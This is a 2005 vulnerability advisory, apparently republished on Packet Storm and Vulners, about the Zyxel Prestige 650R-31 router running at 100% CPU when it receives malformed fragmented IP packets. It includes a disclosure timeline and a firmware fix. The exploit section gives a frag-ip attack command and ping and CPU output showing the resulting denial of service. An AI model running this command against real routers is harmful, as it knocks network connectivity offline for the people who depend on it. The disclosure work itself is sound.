Lucene search
K

ZyxelIPHandling.txt

🗓️ 14 Aug 2005 00:00:00Reported by Federico KirschbaumType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Zyxel Prestige 650R-31 vulnerable to malformed fragmented IP packets, causing 100% CPU usage and denial of connectivit

Code
`||   
|| Infobyte Security Research   
|| www.infobyte.com.ar  
|| 04.08.2005   
||  
  
  
.:: SUMMARY  
  
Prestige 650R-31 (ADSL Router)  
-CPU exausting handling malformed fragmented packets  
  
Affected ZyNOS FW v3.40(KO.1)  
  
It is suspected that all previous versions of ZyNOS are vulnerable.  
  
.:: BACKGROUND  
  
Zyxel Prestige 600 Series, A Popular ADSL (Modem | Router)   
www.zyxel.com   
  
  
.:: DESCRIPTION  
  
Prestige 650R-31 fails handling malformed fragmented IP packets  
The Cpu goes up to 100% when the attack is re-assembled and processed.  
  
  
.:: EXPLOIT   
Any ip crafting tool will do the job, in this case we used   
a fragmented ip generator coded by Fryx  
http://packetstorm.linuxsecurity.com/UNIX/misc/frag.c  
  
<snap>  
  
root@r2d2:~/infobyte# ping 192.168.1.252  
PING 192.168.1.252 (192.168.1.252): 56 octets data  
64 octets from 192.168.1.252: icmp_seq=0 ttl=254 time=2.5 ms  
64 octets from 192.168.1.252: icmp_seq=1 ttl=254 time=2.3 ms  
--- 192.168.1.252 ping statistics ---  
2 packets transmitted, 2 packets received, 0% packet loss  
  
-Prestige Status (Normal)  
Ethernet:  
Status: 100M/Full Duplex Tx Pkts: 71  
Collisions: 0 Rx Pkts: 164  
CPU Load = 4.09%  
  
root@r2d2:~/pentest/infobyte# frag-ip -i 1 -t all -s 7 -p tcp -l 64000 -a 1 170.1.2.3 192.168.1.252  
Sending packets with ID 1 (frags length=56, total length=64000)  
root@r2d2:~/infobyte# ping 192.168.1.252  
PING 192.168.1.252 (192.168.1.252): 56 octets data  
64 octets from 192.168.1.252: icmp_seq=50 ttl=254 time=1002.3 ms   
64 octets from 192.168.1.252: icmp_seq=51 ttl=254 time=7.7 ms   
-- 192.168.1.252 ping statistics ---  
51 packets transmitted, 2 packets received, 93% packet loss  
  
-Prestige Status (During the denial)  
Ethernet:  
Status: 100M/Full Duplex Tx Pkts: 71  
Collisions: 0 Rx Pkts: 164  
CPU Load = 99.59%   
  
<snap>   
  
.:: IMPACT  
  
Total loss of conectivity and forwarding, at least for 1 minute.  
If you send more amount of fragmented packages mores is the denial  
duration.  
  
.:: EXTRA  
  
These procedures where done in a local way  
Remote attacks where not yet made.   
  
  
.:: FIX  
The vendor claims its not a vulnerability, that is rather a "Hardware Limitation"  
But seems an the last release of it's firmware fixed the problem.   
Upgrade the firmware to V3.40(GT.5)  
  
.:: DISCLOSURE TIMELINE  
  
05/02/2005 Initial vendor notification  
05/03/2005 Initial vendor response  
05/08/2005 Vendor determined as a HW limitation  
05/10/2005 No response from vendor to several mails  
  
.:: CREDIT  
  
Federico Kirschbaum is credited with discovering this vulnerability.  
fedek][at][infobyte][dot][com][dot][ar  
  
.:: LEGAL NOTICES  
  
Copyright (c) 2005 by [ISR] Infobyte Security Research.  
Permission to redistribute this alert electronically is granted as long as it is not   
edited in any way unless authorized by Infobyte Security Research Response.   
Reprinting the whole or part of this alert in any medium other than electronically   
requires permission from infobyte com ar  
  
Disclaimer  
The information in the advisory is believed to be accurate at the time of publishing   
based on currently available information. Use of the information constitutes acceptance   
for use in an AS IS condition. There are no warranties with regard to this information.   
Neither the author nor the publisher accepts any liability for any direct, indirect, or   
consequential loss or damage arising from use of, or reliance on, this information.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation